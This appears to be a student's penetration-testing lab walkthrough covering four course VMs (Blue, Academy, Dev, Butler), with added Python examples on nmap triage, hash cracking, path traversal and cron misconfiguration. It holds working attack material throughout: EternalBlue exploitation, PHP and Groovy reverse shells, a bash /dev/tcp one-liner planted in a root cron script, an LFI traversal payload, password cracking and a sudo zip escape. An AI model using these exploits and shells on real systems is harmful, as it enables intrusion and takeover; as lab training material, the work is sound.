Import all the VMs into VMware Workstation Pro (free) or VirtualBox and set each VM's network adapter to NAT, so the Kali box and the targets share one subnet (the 192.168.31.0/24 addresses used below).
O.S. - Windows 7
Credentials:
user:Password123!
administrator:Password456!
mkdir -p ~/tcm/peh/blue/
cd ~/tcm/peh/blue/
sudo nmap -p- -A -T4 192.168.31.132 -oA blue
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:33:BE:EE (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-13T20:57:32
|_ start_date: 2024-07-13T20:49:44
|_nbstat: NetBIOS name: WIN-845Q99OO4PP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:33:be:ee (VMware)
|_clock-skew: mean: 1h19m51s, deviation: 2h18m33s, median: -8s
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: WIN-845Q99OO4PP
| NetBIOS computer name: WIN-845Q99OO4PP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-07-13T16:57:32-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.31.132
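Every box on this page starts with the same `nmap -p- -A -T4 ... -oA name` scan, and the interesting bits (open ports, the SMB signing state that makes the Blue host worth an MS17-010 probe) are buried in the host-script output. The following triage script is an added example written for these notes, not part of the course or of nmap; it parses the XML file that `-oA` writes (assumed to be `blue.xml` here) and flags what to look at first. The embedded XML is a constructed excerpt modelled on the scan above, not a real report.

```python
import xml.etree.ElementTree as ET

# Constructed excerpt modelled on the Blue scan above (not real nmap output);
# a real run reads the file nmap wrote with -oA, e.g. blue.xml.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.31.132" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
    </ports>
    <hostscript>
      <script id="smb2-security-mode" output="&#xa;  2:1:0: &#xa;    Message signing enabled but not required"/>
      <script id="smb-security-mode" output="&#xa;  account_used: guest&#xa;  message_signing: disabled (dangerous, but default)"/>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_hosts(xml_text):
    """Return {ip: {"ports": [(port, service, product), ...], "scripts": {id: output}}},
    keeping only ports nmap reports as open."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = svc.get("product", "") if svc is not None else ""
            ports.append((int(port.get("portid")), name, product))
        # host scripts and port scripts both appear as <script>; key them by id
        scripts = {s.get("id"): s.get("output", "") for s in host.iter("script")}
        hosts[addr.get("addr")] = {"ports": ports, "scripts": scripts}
    return hosts


def smb_signing_required(scripts):
    """True/False from smb2-security-mode or smb-security-mode output;
    None when neither script ran (no SMB, or host scripts disabled)."""
    out = scripts.get("smb2-security-mode") or scripts.get("smb-security-mode")
    if out is None:
        return None
    low = out.lower()
    return "enabled and required" in low or "message_signing: required" in low


def triage(xml_text):
    """One finding per host worth following up, in the order you would attack them."""
    findings = []
    for ip, info in parse_hosts(xml_text).items():
        open_ports = {p for p, _, _ in info["ports"]}
        if 445 in open_ports and smb_signing_required(info["scripts"]) is False:
            findings.append((ip, "SMB exposed without required signing: run smb_ms17_010 and consider NTLM relay"))
        if {21, 80, 8080} & open_ports:
            findings.append((ip, "FTP/HTTP exposed: check anonymous login and directory-bust the web root"))
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for ip, note in triage(text):
        print(f"{ip}: {note}")
```

Run it as `python3 triage.py blue.xml` after the scan; with no argument it processes the constructed sample. The signing check matters beyond EternalBlue: "enabled but not required" is the SMB2 default on workstations and is exactly the condition NTLM relay needs.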
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Metasploit
msfconsole
search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.31.132
run
[+] 192.168.31.132:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOSTS 192.168.31.132
check
# Same as auxiliary/scanner/smb/smb_ms17_010 module
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.131 # Listening HOST/Kali
run
Manual exploit
cd ~/tcm/peh/blue/
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd ~/tcm/peh/blue/AutoBlue-MS17-010
pip install -r requirements.txt
cd shellcode
# Checker
python2 eternal_checker.py 192.168.31.132
❗ EternalBlue corrupts the SMB kernel pool, so the target can blue-screen instead of giving a shell; snapshot the VM before running it and retry after a reboot if it crashes.
cd ~/tcm/peh/blue/AutoBlue-MS17-010/shellcode
./shell_prep.sh
# kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
# y
# LHOST for reverse connection:
# 192.168.31.131
# LPORT you want x64 to listen on:
# 8888
# LPORT you want x86 to listen on:
# 2222
# Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
# 1
# Type 0 to generate a staged payload or 1 to generate a stageless payload
# 0
cd ..
./listener_prep.sh
# Starts a listener
# Open another Terminal
cd ~/tcm/peh/blue/AutoBlue-MS17-010/
python2 eternalblue_exploit7.py 192.168.31.132 shellcode/sc_all.bin
O.S. - Debian 10
Credentials:
root:tcm
mkdir -p ~/tcm/peh/academy
cd ~/tcm/peh/academy/
sudo nmap -p- -A -T4 192.168.31.128 -oA academy
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.31.131
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:F2:81:D6 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.31.128
- Consider attacking ports 21 and 80 first.
- Brute-forcing port 22 (SSH) can be used to check whether the client has network detection in place, and to test some default/weak credentials.
- Visit http://192.168.31.128
- Debian, Apache 2.4.38 default webpage - a sign of poor hygiene
- http://192.168.31.128/phpmyadmin
- First check the discovered versions (vsftpd 3.0.3, OpenSSH 7.9p1, Apache 2.4.38) for known vulnerabilities
- Proceed with the FTP connection (anonymous login is allowed according to the ftp-anon script)
ftp 192.168.31.128
# use anonymous:anonymous user
# 230 Login successful.
ls -lah
get note.txt
- Try http://192.168.31.128/note.txt - Not found
# exit ftp
cat note.txt
Hello Heath !
Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP. I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:
INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');
The StudentRegno number is what you use for login.
Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ?
We can always adapt it to our needs.
-jdelta
10201321 - cd73502828457d15655bbd7a63fb0bc8
hash-identifier
# input cd73502828457d15655bbd7a63fb0bc8
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
- Crack the MD5 hash online or locally
➡️ hashcat
- Inside the Kali VM, hashcat will use only the CPU for cracking the hash (no GPU passthrough), which is fine for a fast unsalted MD5
locate rockyou.txt
# on a fresh Kali the wordlist may still be compressed as rockyou.txt.gz
nano hashes.txt # insert the hash string
# Run hashcat
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
# cd73502828457d15655bbd7a63fb0bc8:student
10201321:student
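What `hashcat -m 0` does here, and why it works so quickly, is worth seeing in code: the application stored an unsalted MD5, so one hash per candidate word is all the work the attacker has to do. The block below is an added example written for these notes (not hashcat's or the course's code): it guesses the hash type the way hash-identifier does, cracks the hash from note.txt against a constructed stand-in for rockyou.txt, and then shows the hardened alternative (random salt plus PBKDF2) that turns the same dictionary attack into per-user, per-guess work. The wordlist is constructed; the hash is the one from the note.

```python
import hashlib
import hmac
import os

TARGET_HASH = "cd73502828457d15655bbd7a63fb0bc8"   # from note.txt (student 10201321)
# Constructed stand-in for /usr/share/wordlists/rockyou.txt
WORDLIST = ["123456", "password", "academy", "student", "grimmie"]


def guess_hash_type(digest_hex):
    """Length-based guess like hash-identifier: 32 hex chars could be MD5, NTLM or MD4."""
    if not all(c in "0123456789abcdef" for c in digest_hex.lower()):
        return "unknown"
    return {32: "MD5/NTLM/MD4", 40: "SHA1", 64: "SHA256"}.get(len(digest_hex), "unknown")


def crack_md5(digest_hex, words):
    """Dictionary attack on an unsalted MD5 (hashcat -m 0): hash each candidate, compare."""
    target = digest_hex.lower()
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == target:
            return w
    return None


def pbkdf2_store(password, iterations=200_000, salt=None):
    """Hardened storage: 16 random salt bytes + PBKDF2-HMAC-SHA256, kept as one string."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt/iterations; constant-time compare."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_pbkdf2(stored, words):
    """Same dictionary attack against the hardened form: still possible for a weak
    password, but every guess costs `iterations` HMACs and the salt kills rainbow tables."""
    for w in words:
        if pbkdf2_verify(w, stored):
            return w
    return None


if __name__ == "__main__":
    print(guess_hash_type(TARGET_HASH), "->", crack_md5(TARGET_HASH, WORDLIST))
    stored = pbkdf2_store("student")
    print(stored)
    print("pbkdf2 cracked:", crack_pbkdf2(stored, WORDLIST))
```

The lesson for the defender is the second half: "student" still falls to the hardened scheme because it is in the wordlist, so the salt and iteration count buy time, not immunity; password policy and no reuse (the note's own warning) are what actually stop the next step of this chain.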
➡️ dirb
dirb http://192.168.31.128
➡️ ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.31.128/FUZZ
academy [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 0ms]
phpmyadmin [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 0ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 0ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 1ms]
- Navigate to http://192.168.31.128/academy
- Log in with the 10201321:student credentials
- Check the pages' source code for CMS versions
- Try to upload a picture - upload successful
- Check the image URL - e.g. http://192.168.31.128/academy/studentphoto/peh-course-solo-icon.png
- Abuse the file upload to get a reverse shell: the uploader accepts a .php file and stores it under studentphoto/, where the server executes it
- Use GitHub - pentestmonkey/php-reverse-shell: copy php-reverse-shell.php into a file named shell.php and set $ip to the Kali VM IP ($port defaults to 1234, matching the listener below)
nc -nvlp 1234
- Upload shell.php using the web image uploader - the file is executed as soon as the page loads it (if not, browse to http://192.168.31.128/academy/studentphoto/shell.php)
- Reverse shell working
whoami
sudo -l # not working
➡️ LinPEAS
# Kali VM
mkdir ~/tools
cd ~/tools
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
python3 -m http.server
# Target reverse shell
cd /tmp
wget http://192.168.31.131:8000/linpeas.sh
# the file will be copied to the target machine
# Run LinPEAS
chmod +x linpeas.sh
./linpeas.sh
- Check for interesting data
* * * * * /home/grimmie/backup.sh
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
cat /var/www/html/academy/admin/includes/config.php
<?php
$mysql_hostname = "localhost";
$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_database = "onlinecourse";
$bd = mysqli_connect($mysql_hostname, $mysql_user, $mysql_password, $mysql_database) or die("Could not connect database");
?>
cat /etc/passwd
grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash
# Kali
ssh grimmie@192.168.31.128
# the MySQL password My_V3ryS3cur3_P4ss is reused for grimmie's account (the password reuse note.txt warned about)
grimmie@academy:~$
sudo -l
history
cat /home/grimmie/backup.sh
#!/bin/bash
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
crontab -l
# no crontab for grimmie
crontab -u root -l
# not permitted as grimmie; root's crontab is what runs backup.sh
systemctl list-timers
➡️ pspy - Monitor linux processes without root permissions
- Download pspy64 and move it into the ~/tools dir where the Python HTTP server is running
# Target
cd /tmp
wget http://192.168.31.131:8000/pspy64
chmod +x pspy64
./pspy64
# Wait for the backup.sh to run
- Run a bash reverse shell one liner
# Kali VM
nc -nvlp 8081
# Target
# Insert the one liner reverse shell into the backup.sh script
cd
nano backup.sh
bash -i >& /dev/tcp/192.168.31.131/8081 0>&1
- backup.sh is run every minute from root's crontab (pspy shows it executing as UID=0), so the appended one-liner runs as root and a root shell lands on the nc listener
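The privesc above rests on one fact: a job that root runs points at a file the low-privileged user can write. After pspy shows a job running as UID 0, this is the check to do by hand on /etc/crontab, /etc/cron.d/* and any crontab you can read. The script below is an added example for these notes (not pspy's or linPEAS's code): it parses crontab-style text, pulls the absolute paths out of each command and reports those the current user can modify. The crontab text in `demo()` is constructed; the backup.sh it references is created in a temp directory so the example runs anywhere.

```python
import os
import re
import shlex
import tempfile


def parse_cron(text, system_table=True):
    """Return [(user, command)] from crontab text. System tables (/etc/crontab,
    /etc/cron.d/*) carry a user field after the schedule; per-user tables
    (crontab -l, /var/spool/cron/crontabs/*) do not, so user is None there."""
    jobs = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+=", s):
            continue  # blank, comment, or an environment assignment like PATH=...
        n_sched = 1 if s.startswith("@") else 5  # @reboot/@daily vs. five time fields
        n_fields = n_sched + (1 if system_table else 0)
        parts = s.split(None, n_fields)
        if len(parts) <= n_fields:
            continue
        user = parts[n_sched] if system_table else None
        jobs.append((user, parts[-1]))
    return jobs


def script_paths(command):
    """Absolute paths in a job command: interpreter, script, anything piped or redirected to."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def writable_cron_scripts(text, system_table=True):
    """(user, path) for every path referenced by a job that exists and that the
    current user may write: if user is root, that is a root shell waiting to happen."""
    hits = []
    for user, cmd in parse_cron(text, system_table):
        for p in script_paths(cmd):
            if os.path.isfile(p) and os.access(p, os.W_OK):
                hits.append((user, p))
    return hits


def demo():
    """Rebuild the Academy situation in a temp dir: a script we own, run by root every minute.
    The crontab text below is constructed for this example."""
    d = tempfile.mkdtemp(prefix="cron-demo-")
    script = os.path.join(d, "backup.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\nrm /tmp/backup.zip\nzip -r /tmp/backup.zip /var/www/html/academy/includes\n")
    os.chmod(script, 0o755)
    crontab = (
        "# m h dom mon dow user command\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        f"* * * * * root {script}\n"
        "@daily root /srv/not-there/rotate.sh > /dev/null\n"
    )
    return script, writable_cron_scripts(crontab)


if __name__ == "__main__":
    script, hits = demo()
    for user, path in hits:
        print(f"{path} is writable and runs as {user}")
```

On a real box feed it `open("/etc/crontab").read()` and each file under /etc/cron.d with `system_table=True`, and the output of `crontab -l` with `system_table=False`. Note that root's own crontab (the `* * * * * /home/grimmie/backup.sh` line linPEAS showed) has no user field, which is why pspy is needed to confirm which UID actually runs it when you cannot read /var/spool/cron/crontabs/root.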
O.S. - Debian 10
Credentials:
root:tcm
sudo arp-scan -l
# Dev IP 192.168.31.130
mkdir -p ~/tcm/peh/dev
cd ~/tcm/peh/dev/
sudo nmap -p- -A -T4 192.168.31.130 -oA dev
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 bd:96:ec:08:2f:b1:ea:06:ca:fc:46:8a:7e:8a:e3:55 (RSA)
| 256 56:32:3b:9f:48:2d:e0:7e:1b:df:20:f8:03:60:56:5e (ECDSA)
|_ 256 95:dd:20:ee:6f:01:b6:e1:43:2e:3c:f4:38:03:5b:36 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Bolt - Installation error
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39417/tcp mountd
| 100005 1,2,3 48134/udp mountd
| 100005 1,2,3 48315/tcp6 mountd
| 100005 1,2,3 49884/udp6 mountd
| 100021 1,3,4 32999/tcp6 nlockmgr
| 100021 1,3,4 37761/tcp nlockmgr
| 100021 1,3,4 49693/udp6 nlockmgr
| 100021 1,3,4 55683/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: PHP 7.3.27-1~deb10u1 - phpinfo()
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
37761/tcp open nlockmgr 1-4 (RPC #100021)
39417/tcp open mountd 1-3 (RPC #100005)
47921/tcp open mountd 1-3 (RPC #100005)
56093/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:B6:91:5C (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.31.130
- http://192.168.31.130/ - Bolt CMS "Installation error" page (it mentions /var/www/html/)
- http://192.168.31.130:8080/ - phpinfo() page - information disclosure (PHP Version 7.3.27-1~deb10u1, filesystem paths, loaded modules)
# Port 80
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.31.130/FUZZ
public [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
src [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 4ms]
app [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 6ms]
vendor [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 1ms]
extensions [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 1ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
# Port 8080
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.31.130:8080/FUZZ
dev [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 3ms]
server-status [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 1ms]
- Navigate to each found directory
showmount -e 192.168.31.130
/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16
sudo mkdir /mnt/dev
sudo mount -t nfs 192.168.31.130:/srv/nfs /mnt/dev
cd /mnt/dev
ls
sudo unzip save.zip
Archive: save.zip
[save.zip] id_rsa password:
cp /mnt/dev/* ~/tcm/peh/dev
chmod 600 ~/tcm/peh/dev/id_rsa
➡️ fcrackzip
sudo apt install fcrackzip
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip
found file 'id_rsa', (size cp/uc 1435/ 1876, flags 9, chk 2a0d)
found file 'todo.txt', (size cp/uc 138/ 164, flags 9, chk 2aa1)
PASSWORD FOUND!!!!: pw == java101
sudo unzip save.zip
# use java101 for password
cat todo.txt
- Figure out how to install the main website properly, the config file seems correct...
- Update development website
- Keep coding in Java because it's awesome
- todo.txt is signed "jp"; try it as the SSH username
ssh -i id_rsa jp@192.168.31.130
# the key is passphrase-protected, so this prompts for a passphrase we do not have yet
- Browsing the directories ffuf found on port 80, the Bolt configuration exposes the database credentials:
database:
driver: sqlite
databasename: bolt
username: bolt
password: I_love_java
- Navigate to the BoltWire application http://192.168.31.130:8080/dev/
searchsploit boltwire
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/36552.txt
BoltWire 6.03 - Local File Inclusion | php/webapps/48411.txt
- Use the Local File Inclusion vulnerability (EDB-ID 48411): it lets an authenticated user read arbitrary files from the server
- Steps to reproduce: create an account and log in, then browse to the following page with an HTTP GET request
http://192.168.31.130:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd
- /etc/passwd shows that the real user is jeanpaul (not jp)
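The payload above tells you how the bug works: whatever is passed in `action` is turned into a file path and loaded, so seven `../` segments walk out of the web root to /etc/passwd. The block below is an added example written for these notes, not BoltWire's code: it reimplements that include logic in Python in both its vulnerable and its hardened form, with a temporary directory standing in for the web root and the host's own /etc/passwd as the file the attacker reaches.

```python
import os
import tempfile


def build_demo_root():
    """Constructed mini web root with one legitimate action file (stand-in for the BoltWire tree)."""
    root = tempfile.mkdtemp(prefix="boltwire-")
    actions = os.path.join(root, "actions")
    os.mkdir(actions)
    with open(os.path.join(actions, "search.php"), "w") as f:
        f.write("<?php /* search action */ ?>\n")
    return root


def include_vulnerable(web_root, action):
    """The advisory's pattern: user input is concatenated into a path and loaded as-is.
    '../' segments walk out of actions/ and out of the web root; no extension is forced."""
    path = os.path.join(web_root, "actions", action)
    with open(path, "rb") as f:
        return f.read()


def include_hardened(web_root, action):
    """Accept only a bare action name, force the extension, resolve symlinks, and
    verify the final path is still inside actions/ (defence in depth, in case a
    symlink or an unexpected name slips past the first check)."""
    if not action or action.startswith(".") or os.sep in action or (os.altsep and os.altsep in action):
        raise ValueError("invalid action name")
    base = os.path.realpath(os.path.join(web_root, "actions"))
    path = os.path.realpath(os.path.join(base, action + ".php"))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes the actions directory")
    with open(path, "rb") as f:
        return f.read()


TRAVERSAL = "../" * 7 + "etc/passwd"  # the payload from the advisory, minus the URL

if __name__ == "__main__":
    root = build_demo_root()
    print(include_vulnerable(root, TRAVERSAL)[:40])
    try:
        include_hardened(root, TRAVERSAL)
    except ValueError as e:
        print("hardened:", e)
```

The first check (no separators, no leading dot) is what stops the traversal; the `realpath` plus `commonpath` check is the backstop that also catches a symlink planted inside actions/ pointing outside it, which the name check alone cannot see.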
cd ~/tcm/peh/dev
ssh -i id_rsa jeanpaul@192.168.31.130
# Enter passphrase for key 'id_rsa':
# Try the Database found password
# I_love_java
jeanpaul@dev:~$
sudo -l
# /usr/bin/zip can be run as root with sudo
- Abuse sudo /usr/bin/zip to escalate to root
➡️ GTFOBins
- Check zip on GTFOBins, Sudo section: "If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access."
- -T tells zip to test the archive and -TT replaces the default test command (unzip -tqq) with one of our own; the trailing # comments out the archive name zip appends, so sh is started by root's zip process
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
id
cd /root
cat flag.txt
O.S. - Windows 10
Credentials:
- Low Privilege User - butler:JeNkIn5@44
- Admin - administrator:A%rc!BcA!
sudo arp-scan -l
# Butler IP 192.168.31.133
mkdir -p ~/tcm/peh/butler
cd ~/tcm/peh/butler/
sudo nmap -p- -A -T4 192.168.31.133 -oA butler
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
7680/tcp open pando-pub?
8080/tcp open http Jetty 9.4.41.v20210516
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.41.v20210516)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:06:23:B3 (VMware)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 1909
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: BUTLER, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:06:23:b3 (VMware)
|_clock-skew: 8h59m49s
| smb2-time:
| date: 2024-07-14T19:54:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms 192.168.31.133
- Navigate to http://192.168.31.133:8080
- Focus on logging into the Jenkins app
- Try default credentials (admin:password) - not working - brute-force with Metasploit or Burp Suite
- Burp Suite: intercept the login request and send it to Intruder
- Use the Cluster bomb attack type (every username against every password), set the payload lists and start the attack; the valid pair is the response whose status/length differs from the failures
- jenkins:jenkins is a valid login
- Disable the proxy and log in with jenkins:jenkins
- Search for code execution attacks, e.g. "jenkins script console exploit"
- Abusing Jenkins Groovy Script Console to get Shell | by Nishant Sharma | Pentester Academy Blog
- From Manage Jenkins / Script Console, use the pure Groovy/Java reverse shell to get a reverse shell (the console runs code with the privileges of the Jenkins service)
# Kali VM
nc -nvlp 8044
# Script Console - run
String host = "192.168.31.131";
int port = 8044;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    // pump cmd.exe output to the socket and socket input to cmd.exe
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
};
p.destroy();
s.close();
whoami
systeminfo
OS Version: 10.0.19043 N/A Build 19043
➡️ WinPEAS
# Kali VM
cd ~/tools
wget https://github.com/peass-ng/PEASS-ng/releases/download/20240714-cd435bb2/winPEASx64.exe
mv winPEASx64.exe winpeas.exe
python3 -m http.server 80
# Target reverse shell
cd c:\Users\butler
